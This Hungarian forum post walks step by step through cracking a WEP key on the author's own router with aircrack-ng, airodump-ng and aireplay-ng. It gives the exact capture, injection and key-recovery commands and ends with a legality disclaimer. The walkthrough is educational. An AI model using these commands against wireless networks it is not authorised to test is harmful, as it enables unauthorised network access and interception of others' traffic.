Sziasztok!
Mi is megpróbálkoztunk a saját routerünk feltörésével. Igaz h "csaltunk" egy kicsit, de meglett.
Méghozzá így: (*-al jelölöm a parancsokat amiket használtunk!)
1, rengeteg anyaggyűjtés az aircrackről, áttanulmányozás, és menet közbe remek segítség!
2 Aircrack telepítés:
*& sudo aptitude install aircrack-ng*
3, *sudo su* -majd a jelszó. ezzel belépsz a root-ba, ahol ezek a dolgok megengedettek
4, *airmon-ng* - kiírja az interface nevét! Jelen esetben: wlan0 (ezt fogom írni, de a tied nem biztos h ez)
5, *airmon-ng start wlan0* - engedélyezzük a monitor módot
Ha jól csináltad vmi ilyet dob ki: monitor mode enabled on mon0 (mon0 - ez egy másik eszköz, szintén lehet eltérés a tieddel)
6 *airodump-ng mon0* - monitorozza a fogható wifi hálózatokat
amiket itt látsz:
BSSID - a kiszemelt MAC címe - sokszor fog kellene!
PWR - röviden: jelerősség
Beacon: A kiszemelt által küldött beaconframe-ek száma. kb 10 db érkezik másodpercenként - mi túl sokat nem foglalkoztunk vele
Data: Ez a lényeg! Attól függ, hogy milyen a wep kód, úgy kell begyűjteni belőle egy jó adagot.
Értsd: egy 64biteshez: legyen pl..: korte - elég kb. 30-40 000 Data
128-Biteshez, ami nehezebb pl..: LeVe$koc@123 - már kell pár-százezer.
Ez csak példa.
CH: az a csatorna amin sugároz a kiszemelt. 1től 13ig
MB: a kiszemelt maximális sebessége
#/s: Az adatcsomagok másodpercenkénti száma az utolsó 10 másodpercben
ENC - a hálózat titkosításának fajtája, wep, wpa, wpa2 stb
SSID: a kiszemelt neve.
7, ha megvan a kiszemelet akkor a követjező parancs:
*airodump-ng [-c ] [-i] [-w ] mon0*
példa: airodump-ng -c 6 -i -w csomag -d 00:11:22:33:44:55 mon0
Szóközökre figyeljetek!
-c: csatorna
-i: Csak IV-ket ment le (WEP törésnél hasznos)
-w: file név, amit megadsz. a file nálam itt volt található : home/peter/csomag-01.ivs
-d: kiszemelt MAC címe
Ha ügyes vagy akkor ugyan olyan válasz fog jönni, mint a 6. lépésben, de most csak 1 hálózatra fixálva.
Figyeljük a Data-t. Nagyon lassúú... kivéva akkor hogy ha használják, mert akkor pörög.
Itt kell begyűjteni minimum 30-40 000-t.
8, Új terminal! *sudo su*-t ne felejtsd!
aireplay-ng! Itt gondba ütköztünk, nem volt jó a csatorna, amin mi sugároztunk, és sajnos nem tudtuk átállítani.
A következő parancsokkal próbálkoztunk:
*aireplay-ng -2 mon0*
*airplay-ng -3 -e (ESSID) -b (BSSID) mon0*
*airplay-ng -4 -e (ESSID) -b (BSSID) mon0*
ezek különböző támadási módszerek, de egyik sem jött be.
Végeredményben mindenhol a következőt kaptuk:
Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 6
wlan0 is on channel 6, but the AP uses channel 1
és a csalás:
Ugyhogy, mivel az aireplay nem működött és mivel saját router volt, ezért másik kettő gép rácsatlakozott, és egyik másolta a megosztott dolgokat saját magának.
A Data vagy 1000/másodperccel pörgött. 300.000 megálltuk.
és jött az utolsó legszebb lépés:
9, aircrack:
*aircrack-ng -b (BSSSID) -e (SSID) -f (fudge) -xy filenév.ivs*
-b: kiszemelt MAC címe
-e: kiszemelt neve, SSID
-f: (fudge) Ennek magas értéke esetén lassúbb lesz az algoritmus, viszont nagyobb esély lesz arra, hogy sikeres lesz (alapesetben: 2). Max -f 8
-xy: Meghatározza hogy az utolsó hány bájton futasson bruteforce algoritmust.
pl: -x 2: Az utolsó két byte-on futtat bruteforce algoritmus. Max: -x 4
filenév: amit megadtál airodump-ba file nevet az kell ide: Figyelj mert lehet a gép átírta a nevet, mint nálunk!!
pl.: ezt adtuk meg: "csomag" és ez lett: "csomag-01"
a file itt van: home/felhasználó/filenév.ivs/.cap
A jó a parancs 1-2 perc és kidobja:
Key Found! és a jelszó!
Mi így csináltuk!
Amiket használtunk oldalak és nagyon hasznosak ehhez a dologhoz:
A leghasznosabb:
https://unixlinux.tmit.bme.hu/Vezet%C3%A9kn%C3%A9lk%C3%BCli_h%C3%A1l%C3%B3zatok_elleni_t%C3%A1mad%C3%A1sok
http://docs.google.com/viewer?a=v&q=cache:TwGc2kxhE-UJ:dl.packetstormsecurity.net/papers/wireless/use_aircrack_by_xel.pdf+aircrack-ng+pdf&hl=hu&gl=hu&pid=bl&srcid=ADGEESikk_C84tfoU4DkkQiz4V9JDda7k7cn7qwbgz2dvaKJ5dT7RuxHwunGcJBQSqGFewu1WXbx8OwL-a9XUm5-UpPx8BOUH-VHqrtuS071487evsbVBd76w-ts46bCDJIl9SSRDq1_&sig=AHIEtbSxkO1WYrD84fG0ZmNYwrpnAi7xeQ
Egyebek:
http://ubuntu.hu/node/5899
http://www.wirelessdefence.org/Contents/Aircrack_aireplay.htm
Hasznos tanácsok:
az épp futó folyamat megállítása: ctrl+c, vagy crtl+z
A BSSID-t más-más parancsoknál más-más betűvel kell írni:
pl: -d 00:11:22:33:44:55 vagy -b 00:11... vagy -a 00:11...
a PWR minnál kissebb annál jobb. ha 1-es akkor nem tudod fogni!
Ennyi jutott most eszembe!
Kérdezz bátran, segítek ha tudok!
És ne feledd! Csak addig törvényes feltörni a wifit amíg a tied!